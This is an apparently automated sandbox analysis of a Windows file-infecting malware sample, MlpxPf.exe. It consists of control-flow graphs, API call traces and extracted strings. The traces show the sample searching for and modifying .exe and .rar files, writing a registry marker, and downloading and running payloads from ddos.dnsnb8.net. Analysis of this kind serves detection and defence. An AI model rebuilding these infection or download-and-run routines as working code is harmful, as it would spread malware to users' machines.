                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: ab547d4a878bae447211bd45e7bd5716fdefa7659d949dc6c76ad0f39ecfa44b
                                    • Instruction ID: a70746f7e6d78dfcac24dfa51d5855bcc21d08ffd72ae96832c21c7af0c16f09
                                    • Opcode Fuzzy Hash: ab547d4a878bae447211bd45e7bd5716fdefa7659d949dc6c76ad0f39ecfa44b
                                    • Instruction Fuzzy Hash: FC4141B2404349BFDB20DBA0DC4DDEB7BECFB94315F04082AF544D2111E634DA589BA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 231 596076-596079 232 59607b-596080 231->232 233 5960e0-5960eb 231->233 235 596082-596085 232->235 236 5960f7-5960f8 232->236 234 5960ee-5960f4 233->234 237 5960f6 234->237 235->237 240 596087 235->240 238 5960fa-5960fc call 5966c8 236->238 239 5960fe-596106 236->239 237->236 238->239 242 596108-59611d 239->242 243 596155-596189 VirtualFree 239->243 240->234 244 596089-596095 240->244 248 59611f-596121 242->248 251 59618c-596192 243->251 245 5960a1-5960aa 244->245 246 596097-59609f 244->246 249 5961ba-5961c8 245->249 250 5960b0-5960c1 VirtualAlloc 245->250 246->245 252 596151-596154 248->252 253 596123 248->253 256 5961ca-5961d7 249->256 257 596243-596251 249->257 254 5960c7-5960cf 250->254 251->254 255 596198-5961b0 VirtualFree 251->255 252->243 253->252 258 596125-596128 253->258 254->251 261 5960d5-5960df VirtualAlloc 254->261 255->249 262 5961b2-5961b4 255->262 263 5961dd-5961e0 256->263 264 596253 257->264 265 596264-59626f 257->265 259 59612a-59612e 258->259 260 596134-59613b 258->260 259->260 271 596130-596132 259->271 260->271 272 59613d-59614f 260->272 261->233 262->249 263->257 268 5961e2-5961f2 263->268 269 596255-596258 264->269 270 596271-596276 265->270 273 5961f5-5961fe 268->273 269->265 274 59625a-596262 269->274 275 596389-5963b1 VirtualProtect 270->275 276 59627c-596289 270->276 271->248 272->248 278 59620c-596219 273->278 279 596200-596203 273->279 274->269 277 5963b7-5963ba 275->277 286 59628b 276->286 287 596292-596298 276->287 280 5963fc-5963ff VirtualProtect 277->280 281 5963bc-5963c2 277->281 282 596238-59623f 278->282 283 59621b-596228 279->283 284 596205-596208 279->284 291 596400-596416 280->291 281->281 288 5963c4 281->288 282->273 292 596241 282->292 283->282 289 59622a-596236 284->289 290 59620a 284->290 286->287 293 5962a2-5962ac 287->293 288->280 294 5963c6-5963cf 288->294 289->282 290->282 295 596418-59641d 291->295 296 596420-596425 291->296 292->263 297 5962ae 293->297 298 5962b1-5962c8 293->298 299 5963d1 294->299 300 5963d4-5963d8 294->300 297->298 301 5962ce-5962d4 298->301 302 596373-596384 298->302 299->300 303 5963da 300->303 304 5963dd-5963e1 300->304 305 5962da-5962f1 301->305 306 5962d6-5962d9 301->306 302->270 303->304 307 5963e3 304->307 308 5963e7-5963fa VirtualProtect 304->308 310 5962f3-5962f9 305->310 311 596365-59636e 305->311 306->305 307->308 308->277 308->280 312 5962fb-59630f 310->312 313 596314-596326 310->313 311->293 314 596426-5964c0 312->314 315 596328-59634a 313->315 316 59634c-596360 313->316 325 5964c2 314->325 326 596535-596537 314->326 315->311 316->314 327 5964f8 325->327 328 5964c5-5964cd 325->328 329 596539 326->329 330 59659a 326->330 336 5964fa-5964fe 327->336 337 59656c-59656f 327->337 334 5964cf-5964d4 328->334 335 596542-596545 328->335 331 59653b-596541 329->331 332 5965b4 329->332 333 59659b-59659d 330->333 331->335 343 5965be-5965db 332->343 338 59659f 333->338 339 596591-596593 333->339 341 596517-59651c 334->341 342 5964d6-5964d9 334->342 340 59654d-596550 335->340 344 596572 336->344 345 596500 336->345 337->344 346 596588-59658b 338->346 339->333 355 596595 339->355 340->343 347 596552-596556 340->347 353 59651d-59651e 341->353 354 596583-596587 341->354 342->340 348 5964db-5964f5 342->348 349 5965dd-5965f6 343->349 350 596573-596576 344->350 351 596522-596533 345->351 352 596502 345->352 360 59658d-59658f 346->360 361 5965a1-5965a3 346->361 356 596578-59657a 347->356 357 596558-596569 347->357 348->327 358 5965f7-596608 349->358 350->356 351->326 352->350 359 596504-596513 352->359 353->351 354->346 355->330 356->349 362 59657c 356->362 357->337 359->326 363 596515 359->363 360->339 362->358 364 59657e-59657f 362->364 363->341 364->354
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 005960BE
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 005960DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00596189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005961A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID: kernel32.dll
                                    • API String ID: 2087232378-1793498882
                                    • Opcode ID: 57392ed85d71d72a391a9c1ee219f78c80ce79bbad3bdefca44d300379009dbe
                                    • Instruction ID: a607187470feeeb83745a9dcc0195317d5ae804dfdb08735b76de7923223da78
                                    • Opcode Fuzzy Hash: 57392ed85d71d72a391a9c1ee219f78c80ce79bbad3bdefca44d300379009dbe
                                    • Instruction Fuzzy Hash: E31221B25087858FDF328F64CC95BEA3FB4FF02310F1945AED8898B192D674A908C751

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 365 591718-591733 GetSystemTimeAsFileTime 366 591735-591752 SHSetValueA 365->366 367 591754-591758 365->367 368 5917c6-5917cd 366->368 367->368 369 59175a-591784 SHGetValueA 367->369 369->368 370 591786-5917b3 call 592cf0 * 2 369->370 370->368 375 5917b5 370->375 376 5917bf 375->376 377 5917b7-5917bd 375->377 376->368 377->368 377->376
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0059174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0059177C
                                    • __aulldiv.LIBCMT ref: 00591796
                                    • __aulldiv.LIBCMT ref: 005917A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-2397731975
                                    • Opcode ID: 4d921809d40679e52f0d9cd9bef011e07ec6d6c875622af7ae24bb40f93f5141
                                    • Instruction ID: 3324f9893490aebafad8f03930cbe40e79d0ae96ab69713fe1edca02508bf970
                                    • Opcode Fuzzy Hash: 4d921809d40679e52f0d9cd9bef011e07ec6d6c875622af7ae24bb40f93f5141
                                    • Instruction Fuzzy Hash: 21118E76A0021AFBDF109BD4C889FEF7FBCFB50B10F108015F901A6281D6719A48DB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 591e6e-591e95 call 592d60 3 591e9c-591eaa call 591df6 0->3 4 591e97 call 591d8a 0->4 8 591eb0-591ed9 SetFileAttributesA CreateFileA 3->8 9 592332 3->9 4->3 8->9 10 591edf-591f28 call 591915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 592338-59233b 9->11 10->9 20 591f2e-591f39 10->20 13 59233d-592340 UnmapViewOfFile 11->13 14 592346-592349 11->14 13->14 15 59234b-59234e CloseHandle 14->15 16 592350-592354 14->16 15->16 18 592391-59239a call 592d9b 16->18 19 592356-59235b CloseHandle 16->19 19->18 20->9 22 591f3f-591f56 20->22 22->9 23 591f5c-591f64 22->23 23->9 25 591f6a-591f70 23->25 25->9 26 591f76-591f87 call 591c81 25->26 26->9 29 591f8d-591fa7 call 59185b call 591c81 26->29 29->9 34 591fad-591fb4 29->34 35 592024-592045 34->35 36 591fb6-591fc5 call 591af9 34->36 35->9 37 59204b-59204e 35->37 36->35 44 591fc7-591fd2 36->44 39 592070-5920f4 call 591af9 * 2 call 591c68 * 2 memset * 2 37->39 40 592050-592053 37->40 62 5920f5-5920fe 39->62 42 592056-59205a 40->42 42->39 45 59205c-592061 42->45 44->9 47 591fd8-591fe7 44->47 45->9 51 592067-59206e 45->51 49 591fe9-591fec 47->49 50 591fef-592006 call 591af9 47->50 49->50 57 592008-59200e call 591c68 50->57 58 592013-59201e FlushViewOfFile 50->58 51->42 57->58 58->35 63 592130-592139 62->63 64 592100-592114 62->64 67 59213c-592142 63->67 65 59212d-59212e 64->65 66 592116-59212a 64->66 65->62 66->65 68 59215c 67->68 69 592144-592150 67->69 70 59215f-592162 68->70 71 592152-592154 69->71 72 592157-59215a 69->72 73 592181-592184 70->73 74 592164-592171 70->74 71->72 72->67 77 59218d-5921ba call 591c68 73->77 78 592186 73->78 75 59232a-59232d 74->75 76 592177-59217e 74->76 75->70 76->73 81 5921bc-5921d0 call 591c68 77->81 82 5921d3-59220b call 591c81 call 591c68 77->82 78->77 81->82 89 59221b-59221e 82->89 90 59220d-592218 call 591c68 82->90 92 592220-592223 89->92 93 592226-592328 memcpy UnmapViewOfFile CloseHandle call 591b8a call 59185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 591915 CloseHandle 89->93 90->89 92->93 93->11
                                    APIs
                                    • SetFileAttributesA.KERNELBASE(?,00000080,?,005932B0,00000164,00592986,?), ref: 00591EB9
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00591ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00591EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00591F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00591F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0059201E
                                    • memset.MSVCRT ref: 005920D8
                                    • memset.MSVCRT ref: 005920EA
                                    • memcpy.MSVCRT ref: 0059222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00592238
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0059224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922DD
                                    • WriteFile.KERNEL32(000000FF,00594008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005922F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0059230D
                                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00592322
                                    • UnmapViewOfFile.KERNEL32(?,?,005932B0,00000164,00592986,?), ref: 00592340
                                    • CloseHandle.KERNEL32(?,?,005932B0,00000164,00592986,?), ref: 0059234E
                                    • CloseHandle.KERNEL32(000000FF,?,005932B0,00000164,00592986,?), ref: 00592359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                    • String ID: .@Y$5@Y$<@Y$C@Y$m@Y
                                    • API String ID: 3043204753-3427592209
                                    • Opcode ID: 353e7cba75776ac347e717a0d0ea02423ccdb48f5d2a5d99e6ef10809eec598f
                                    • Instruction ID: 1abf0ad4c91be4eb5edc38eadb162e14311d95817c2faac58528397921e8b948
                                    • Opcode Fuzzy Hash: 353e7cba75776ac347e717a0d0ea02423ccdb48f5d2a5d99e6ef10809eec598f
                                    • Instruction Fuzzy Hash: E2F18C7090061AEFCF20DFA8DC89AADBBB5FF18304F10452AE50AA7661D734AD91DF54

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 00592766
                                    • memset.MSVCRT ref: 00592774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00592787
                                    • wsprintfA.USER32 ref: 005927AB
                                      • Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591894
                                    • wsprintfA.USER32 ref: 005927C6
                                    • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\08660606.exe,00000000), ref: 005927D4
                                    • wsprintfA.USER32 ref: 005927F4
                                      • Part of subcall function 00591973: PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
                                      • Part of subcall function 00591973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
                                      • Part of subcall function 00591973: Sleep.KERNEL32(00000064), ref: 005919C6
                                      • Part of subcall function 00591973: wsprintfA.USER32 ref: 005919EC
                                      • Part of subcall function 00591973: CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
                                      • Part of subcall function 00591973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
                                      • Part of subcall function 00591973: GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
                                      • Part of subcall function 00591973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
                                      • Part of subcall function 00591973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65
                                    • DeleteFileA.KERNEL32(?,?,00594E54,00594E58), ref: 0059281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00594E54,00594E58), ref: 00592832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\08660606.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-431344584
                                    • Opcode ID: dc0b3b8e23df65621326bf90b0ca613b7b7857828b22a5b789718e4df8440cb5
                                    • Instruction ID: c8fc072536396e22a54686e9a1d4382b5b940d4f3d96cd6b3fec90baa2bfa38e
                                    • Opcode Fuzzy Hash: dc0b3b8e23df65621326bf90b0ca613b7b7857828b22a5b789718e4df8440cb5
                                    • Instruction Fuzzy Hash: B32184B6D4021CBBDF10E7A49C8AFEB7B6CFB14744F0005A2B644E2051E670DF488EA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 126 591973-59199a PathFileExistsA 127 5919a0-5919aa 126->127 128 591ac7-591acc 126->128 131 5919af-5919c2 CreateFileA 127->131 129 591ace 128->129 130 591ad0-591ad5 128->130 129->130 132 591af0-591af6 130->132 133 591ad7-591ad9 130->133 134 591a28-591a36 GetFileSize 131->134 135 5919c4-5919d3 Sleep 131->135 133->132 136 591a38-591a3b 134->136 137 591a87-591a8b 134->137 135->131 138 5919d5-591a0b call 59185b wsprintfA CopyFileA 135->138 136->137 139 591a3d-591a51 VirtualAlloc 136->139 140 591a8d-591a90 FindCloseChangeNotification 137->140 141 591a96-591a9a 137->141 138->134 152 591a0d-591a26 CreateFileA 138->152 139->137 143 591a53-591a57 139->143 140->141 144 591aad-591ab1 141->144 145 591a9c 141->145 147 591a59-591a6d ReadFile 143->147 148 591a80 143->148 150 591adb-591ae0 144->150 151 591ab3-591ab6 144->151 149 591aa0-591aa7 DeleteFileA 145->149 147->137 153 591a6f-591a7e 147->153 148->137 149->144 154 591ae2-591ae5 150->154 155 591ae7-591aec 150->155 151->128 156 591ab8-591ac1 VirtualFree 151->156 152->134 157 591a9e 152->157 153->147 153->148 154->155 155->132 158 591aee 155->158 156->128 157->149 158->132
                                    APIs
                                    • PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
                                    • Sleep.KERNEL32(00000064), ref: 005919C6
                                    • wsprintfA.USER32 ref: 005919EC
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65
                                    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00591A90
                                    • DeleteFileA.KERNEL32(?), ref: 00591AA7
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00591AC1
                                    Strings
                                    • \NY`NY, xrefs: 00591980
                                    • %s%.8X.data, xrefs: 005919E6
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 005919DB
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 0059197C
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$\NY`NY
                                    • API String ID: 2523042076-2589312797
                                    • Opcode ID: 0085aeb9575bdb8265e9bf528b8118cb8d15a035759d248f53b2e8cbe13b8623
                                    • Instruction ID: 9ca6f233662e0c780f0afc4cfbf9eda622e6b9e70392e13f1e6b5b0d5d6caf56
                                    • Opcode Fuzzy Hash: 0085aeb9575bdb8265e9bf528b8118cb8d15a035759d248f53b2e8cbe13b8623
                                    • Instruction Fuzzy Hash: 2F515E7190162AEFCF10DF98CD88AAEBFB9FB05354F10456AF515E6190D3309E44DB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 159 5928b8-5928ff memset wsprintfA 160 5929db-5929df 159->160 161 592905-59290d 159->161 161->160 162 592913-592919 161->162 163 59291b-59294c memset wsprintfA call 5929e2 162->163 164 592956-592965 strrchr 162->164 167 592951 163->167 164->160 166 592967-592978 lstrcmpiA 164->166 168 592988-592992 lstrcmpiA 166->168 169 59297a-592981 call 591e6e 166->169 167->160 168->160 171 592994-59299b 168->171 172 592986 169->172 173 5929ad-5929c9 strstr 171->173 174 59299d-5929a3 171->174 172->160 176 5929cb-5929d1 call 59239d 173->176 177 5929d3-5929d6 call 592692 173->177 174->173 175 5929a5-5929a7 lstrcpy 174->175 175->173 176->160 177->160
                                    APIs
                                    • memset.MSVCRT ref: 005928D3
                                    • wsprintfA.USER32 ref: 005928F7
                                    • memset.MSVCRT ref: 00592925
                                    • wsprintfA.USER32 ref: 00592940
                                      • Part of subcall function 005929E2: memset.MSVCRT ref: 00592A02
                                      • Part of subcall function 005929E2: wsprintfA.USER32 ref: 00592A1A
                                      • Part of subcall function 005929E2: memset.MSVCRT ref: 00592A44
                                      • Part of subcall function 005929E2: lstrlen.KERNEL32(?), ref: 00592A54
                                      • Part of subcall function 005929E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00592A6C
                                      • Part of subcall function 005929E2: strrchr.MSVCRT ref: 00592A7C
                                      • Part of subcall function 005929E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00592A9F
                                      • Part of subcall function 005929E2: lstrlen.KERNEL32(Documents and Settings), ref: 00592AAE
                                      • Part of subcall function 005929E2: memset.MSVCRT ref: 00592AC6
                                      • Part of subcall function 005929E2: memset.MSVCRT ref: 00592ADA
                                      • Part of subcall function 005929E2: FindFirstFileA.KERNELBASE(?,?), ref: 00592AEF
                                      • Part of subcall function 005929E2: memset.MSVCRT ref: 00592B13
                                    • strrchr.MSVCRT ref: 00592959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00592974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-1035934456
                                    • Opcode ID: b1b601d850350e5f4e5f18fe75aa3dc1b34c9771721fa7e28f81e67a55b1a99c
                                    • Instruction ID: b2e5358e15b293a50ea470da3872ee947fb52cb201c41ddce36e59c764fe2cfc
                                    • Opcode Fuzzy Hash: b1b601d850350e5f4e5f18fe75aa3dc1b34c9771721fa7e28f81e67a55b1a99c
                                    • Instruction Fuzzy Hash: 7431847694031DBBDF20A764DC8AFDA7F6CBB24710F050853F545A6181E6B49EC49BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 591099-5910b4 182 591199-59119c 181->182 183 5910ba-5910c7 181->183 184 5910c8-5910d4 183->184 185 5910da 184->185 186 591184-591190 184->186 188 591113-591162 call 59185b wsprintfA * 2 URLDownloadToFileA 185->188 186->184 187 591196-591198 186->187 187->182 191 591168-591182 lstrlen Sleep 188->191 192 5910dc-59110d call 591000 WinExec lstrlen 188->192 191->186 191->188 192->187 192->188
                                    APIs
                                      • Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591894
                                    • WinExec.KERNEL32(?,00000005), ref: 005910F1
                                    • lstrlen.KERNEL32(00594748), ref: 005910FA
                                    • wsprintfA.USER32 ref: 0059112A
                                    • wsprintfA.USER32 ref: 00591143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0059115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00591169
                                    • Sleep.KERNEL32 ref: 00591179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGY$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-4043388241
                                    • Opcode ID: 1962e309231677c652c9dfa736fc4fa77464fae7038edd3773208b8e8ccddc81
                                    • Instruction ID: 39acff978246a673b51eaaadf8446ee69415f373d849e8fbc827cc8a2be5f539
                                    • Opcode Fuzzy Hash: 1962e309231677c652c9dfa736fc4fa77464fae7038edd3773208b8e8ccddc81
                                    • Instruction Fuzzy Hash: A8217A75900219FBDF209BA0DC49EAFBFBDFB15315F124096E501A2050D7749E89EFA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 195 591581-5915f9 call 59185b wsprintfA * 2 lstrlen CreateFileA 198 5915fb-59161b WriteFile CloseHandle 195->198 199 591633-591637 195->199 198->199 200 59161d-59162d ShellExecuteA 198->200 200->199
                                    APIs
                                      • Part of subcall function 0059185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591878
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591880
                                      • Part of subcall function 0059185B: srand.MSVCRT ref: 00591890
                                      • Part of subcall function 0059185B: rand.MSVCRT ref: 00591894
                                    • wsprintfA.USER32 ref: 005915AA
                                    • wsprintfA.USER32 ref: 005915C6
